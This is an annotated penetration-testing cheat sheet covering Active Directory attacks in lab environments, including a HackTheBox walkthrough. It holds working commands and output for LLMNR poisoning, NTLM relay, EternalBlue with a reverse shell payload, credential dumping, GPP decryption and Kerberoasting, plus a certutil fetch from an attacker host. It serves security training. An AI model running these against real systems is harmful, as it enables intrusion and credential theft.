# Commands

```
ifconfig
iwconfig

# On Linux, ping runs until interrupted (Ctrl-C); -c limits the number of probes. Windows ping sends 4 by default.
$ ping -c 1 192.168.1.254
#         ^ ping with count of 1

$ arp -a
_gateway (10.0.2.2) at 52:54:00:12:35:02 [ether] on eth0
#       -a     Use alternate BSD style output format (with no fixed columns).

$ netstat -ano
#   -a, --all
#       Show  both  listening  and  non-listening sockets.  With the --interfaces option,
#       show interfaces that are not up
#       
#   --numeric, -n
#       Show  numerical  addresses  instead of trying to determine symbolic host, port or
#       user names.
#
#   -o, --timers
#       Include information related to networking timers.
#   NB: that is the Linux (net-tools) meaning of -o. On Windows, `netstat -ano` is the common
#       idiom because there -o shows the owning process ID (see the Windows shell further down).

$ route # show / manipulate the IP routing table

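# Print the default gateway (router) IP. Asking the kernel for the default route directly
# avoids grepping free-text output; prints one address per default route if several exist.
$ ip route show default | awk '{print $3}'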

$ tr -s ' ' <text.txt | cut -d ' ' -f4
# -s, --squeeze-repeats  replace each input sequence of a repeated character
#                        that is listed in SET1 with a single occurrence
#                        of that character

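# Assorted local admin commands (placeholders in CAPS).
adduser USERNAME          # create a local account; interactive, needs root
locate PATTERN            # search the locate database (may be stale until updatedb runs)
updatedb                  # rebuild the database locate searches; needs root
chmod +x FILE             # mark a file executable
su USERNAME               # switch user; root if the name is omitted
apt purge PACKAGE         # remove a package *and* its config files ("apt-purge" is not a command; apt-get purge also works)
eog IMAGE                 # Eye of GNOME photo viewer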

$ hash -r
# After installing or removing binaries with apt, reset bash's cached command lookups: bash remembers the path of each command it has already run, so a removed or replaced binary may otherwise still resolve to the old location.
# https://stackoverflow.com/questions/16237490/i-screwed-up-the-system-version-of-python-pip-on-ubuntu-12-10

# Linux. Expect hashcat to be much slower inside a VM (typically no direct GPU access) than on bare metal.
hashcat -m 5600 hash.txt /root/rockyou.txt #NetNTLMv2

# Windows
..\hashcat-4.2.1>hashcat64.exe -m 5600 hash.txt rockyou.txt

# Responder poisons LLMNR/NBT-NS/mDNS name lookups on the given interface (-I eth0) and captures
# the NetNTLMv2 hashes victims send back (crack them with `hashcat -m 5600`, above).
# -r/-d/-w switch on extra answer types; -r in particular is disruptive — Responder's own help
# text warns it will likely break things on the network. Use only on networks you are authorised to test.
# If the goal is to relay rather than capture, Responder's SMB and HTTP servers must be disabled
# in Responder.conf first (see ntlmrelayx below).
python Responder.py -I eth0 -rdw

# Try one domain credential (MARVEL\Administrator) over SMB against every host in a range.
# Keep the password in single quotes: unquoted, bash would expand '$$' to the shell's PID.
# Each failed logon counts against the account's bad-password count on the DC, so a wrong
# password tried across many hosts can lock the account out — check the lockout policy first.
crackmapexec smb <ip range> -u Administrator -p 'P@$$word!' -d MARVEL

# Token impersonation with the incognito extension. Listing and stealing tokens generally needs
# a privileged session — here the shell is already NT AUTHORITY\SYSTEM (getuid below) — and only
# tokens present on this host (users with a logon session here) can be impersonated.
meterpreter > load incognito
meterpreter > list_tokens -u # users
meterpreter > list_tokens -g # group
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
# The backslash is doubled because the meterpreter console treats "\" as an escape character.
# A *delegation* token (as opposed to an impersonation-only token) can authenticate to other
# hosts on the network as that user, not just act locally.
meterpreter > impersonate_token MARVEL\\Administrator
[+] Delegation token available
[+] Successfully impersonated user MARVEL\Administrator
meterpreter > getuid
Server username: MARVEL\Administrator
meterpreter > shell
...
C:\Windows\system32>whoami
marvel\administrator

# With a meterpreter session running: enumerate local privilege-escalation candidates.
# The suggester only checks that an exploit's prerequisites *appear* to be met — it does not
# confirm exploitability, and some suggested kernel exploits can crash the target. Review
# each suggestion before running it.
msf5 > use post/multi/recon/local_exploit_suggester
msf5 post(post/multi/recon/local_exploit_suggester) > set session 1
msf5 post(post/multi/recon/local_exploit_suggester) > run
...
# Interact with the session
msf5 > sessions 1
# List processes (useful for picking a migration target and spotting AV/EDR agents)
meterpreter > ps

# NTLM relay: forward authentication captured from victims on to the hosts listed in target.txt.
# Preconditions worth checking before relying on this:
#   - targets must NOT require SMB signing (domain controllers require it by default, so relaying
#     to a DC over SMB fails; pick hosts where signing is enabled but not required)
#   - Responder's SMB and HTTP servers must be turned off in Responder.conf, otherwise Responder
#     answers the authentication itself and nothing is relayed
#   - -smb2support lets the rogue SMB server accept victims that only speak SMB2 (SMB1 is off on modern Windows)
locate ntlmrelayx.py # it's in impacket
python ntlmrelayx.py -tf target.txt -smb2support


# MS17-010 (EternalBlue). The nmap script is a non-destructive check; the Metasploit exploit
# attacks the kernel SMBv1 driver and can blue-screen the host if the target/offsets are wrong —
# get explicit approval before running it against anything that matters.
nmap -Pn -p445 --script=smb-vuln-ms17-010 <ip>

# rhosts/lhost are set before this (not shown). On success the payload typically runs as SYSTEM,
# which is what makes hashdump (dumping the local SAM hashes) possible.
msf5 exploit(windows/smb/ms17_010_eternalblue) > set payload windows/x64/meterpreter/reverse_tcp
meterpreter > sysinfo
meterpreter > hashdump

meterpreter > shell
c:\Users\Administrator>arp -a
c:\Users\Administrator>route print

# Check whether the host is dual-homed (NICs on two networks, e.g. 10.10.10.x and 10.10.11.x):
# a dual-homed host can be used as a pivot into the second network.
c:\Users\Administrator>netstat -ano
^C terminate channel -> back to meterpreter

meterpreter > load incognito
meterpreter > list_tokens -u

# kiwi (mimikatz) extension. On a 64-bit host it has to run from a 64-bit meterpreter: loading
# it from an x86 session on x64 Windows warns and does not work properly — migrate into a 64-bit
# process first (check sysinfo). creds_all reads credentials out of LSASS memory and needs SYSTEM
# (or SeDebugPrivilege); wifi_list dumps saved wireless profiles.
meterpreter > load kiwi # this is x64
meterpreter > creds_all
meterpreter > wifi_list

root@kali:~/Security/HackTheBox/active# smbclient -L \\\\10.10.10.100\\
Enter WORKGROUP\root's password: # pressed Enter: an empty password gives a null (anonymous) session; `smbclient -N` skips the prompt
Anonymous login successful

    Sharename       Type      Comment
    ---------       ----      -------
    ADMIN$          Disk      Remote Admin
    C$              Disk      Default share
    IPC$            IPC       Remote IPC
    NETLOGON        Disk      Logon server share 
    Replication     Disk      
    SYSVOL          Disk      Logon server share 
    Users           Disk      
SMB1 disabled -- no workgroup available


root@kali:~/Security/HackTheBox/active# smbclient \\\\10.10.10.100\\Replication
Enter WORKGROUP\root's password: 
Anonymous login successful
Try "help" to get a list of possible commands.
# Pull the whole share non-interactively: RECURSE ON descends into directories, PROMPT OFF
# suppresses the per-file confirmation, then mget * fetches everything. The paths below look
# like a copy of SYSVOL\Policies — the Groups.xml is the file that holds a GPP cpassword.
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\GPT.INI of size 23 as GPT.INI (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\Group Policy\GPE.INI of size 119 as GPE.INI (0.4 KiloBytes/sec) (average 0.2 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 1098 as GptTmpl.inf (3.1 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Preferences\Groups\Groups.xml of size 533 as Groups.xml (1.5 KiloBytes/sec) (average 1.3 KiloBytes/sec)
getting file \active.htb\Policies\{31B2F340-016D-11D2-945F-00C04FB984F9}\MACHINE\Registry.pol of size 2788 as Registry.pol (9.4 KiloBytes/sec) (average 2.8 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\GPT.INI of size 22 as GPT.INI (0.1 KiloBytes/sec) (average 2.4 KiloBytes/sec)
getting file \active.htb\Policies\{6AC1786C-016F-11D2-945F-00C04fB984F9}\MACHINE\Microsoft\Windows NT\SecEdit\GptTmpl.inf of size 3722 as GptTmpl.inf (12.5 KiloBytes/sec) (average 3.8 KiloBytes/sec)

# gpp-decrypt recovers the plaintext from the cpassword attribute in Groups.xml (pulled above).
# Group Policy Preferences passwords are AES-256 encrypted with a key Microsoft published in
# its own protocol documentation, so anyone who can read SYSVOL — every domain user — can
# decrypt them. MS14-025 stopped new ones being created but left existing files in place.
root@kali:~/Security/HackTheBox/active# gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
/usr/bin/gpp-decrypt:21: warning: constant OpenSSL::Cipher::Cipher is deprecated
GPPstillStandingStrong2k18

# Kerberoasting with impacket: authenticate as the low-privilege account recovered from GPP and
# ask the DC for a service ticket (-request) for every user account that has an SPN. The ticket
# is encrypted with the service account's password hash, so it can be cracked offline. This
# needs nothing more than a valid domain account.
root@kali:~/Security/HackTheBox/active# cd /opt/impacket/examples/
root@kali:/opt/impacket/examples# python GetUserSPNs.py active.htb/SVC_TGS -dc-ip 10.10.10.100 -request
Impacket v0.9.21-dev - Copyright 2019 SecureAuth Corporation

Password: # entered GPPstillStandingStrong2k18
ServicePrincipalName  Name           MemberOf                                                  PasswordLastSet             LastLogon                  
--------------------  -------------  --------------------------------------------------------  --------------------------  --------------------------
active/CIFS:445       Administrator  CN=Group Policy Creator Owners,CN=Users,DC=active,DC=htb  2018-07-18 15:06:40.351723  2018-07-30 13:17:40.656520 


# The $krb5tgs$23$ prefix means the ticket uses RC4-HMAC (etype 23): crack it with `hashcat -m 13100`.
# Here the SPN sits on the Administrator account itself, so cracking it yields domain admin outright.
$krb5tgs$23$*Administrator$ACTIVE.HTB$active/CIFS~445*$cfe6baaf6d9538cee9ab43897032e0fa$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

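# Moving files onto a Windows host. Defender may flag known tooling, and certutil-as-downloader
# is itself widely alerted on. The usual dodge of "splitting" a file means chunking it so no single
# piece matches a signature, then reassembling it on the host — treat that as a hint, not a recipe.

# GRAB FILES - HTTP (living-off-the-land: certutil fetches a URL into a local file)
# The option is -urlcache (the original note had a typo, -rulcache); -split writes the fetched
# body to the output file and -f forces a fresh download instead of using the cache.
C:\Users\fcastle>certutil -urlcache -split -f http://<ip>/secrets.txt secrets.txt

# GRAB FILES - FTP (built-in interactive ftp client; `ftp -s:script.txt` runs it non-interactively)
C:\Users\fcastle>ftp <ip>
ftp> get <file>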

# Lateral movement with psexec: authenticate over SMB with a known credential, then create and
# start a service on the target that runs the payload. Requires local admin on rhosts. It is
# noisy — a service-install event (System log 7045) and an uploaded binary are left behind, and
# AV commonly flags it.
msf5 > use windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set rhosts 192.168.202.134
msf5 exploit(windows/smb/psexec) > set smbdomain marvel
msf5 exploit(windows/smb/psexec) > set smbpass Password1
msf5 exploit(windows/smb/psexec) > set smbuser fcastle
# 'target 2' selects one of the module's execution techniques in this msf5 version — run `show targets` to confirm which
msf5 exploit(windows/smb/psexec) > set target 2
msf5 exploit(windows/smb/psexec) > run
...
# Backslashes are doubled because the meterpreter console treats "\" as an escape character.
meterpreter > cd c:\\users
meterpreter > upload /root/files/secrets.txt c:\\secrets.txt
meterpreter > download c:\\secrets.txt secrets.txt


```

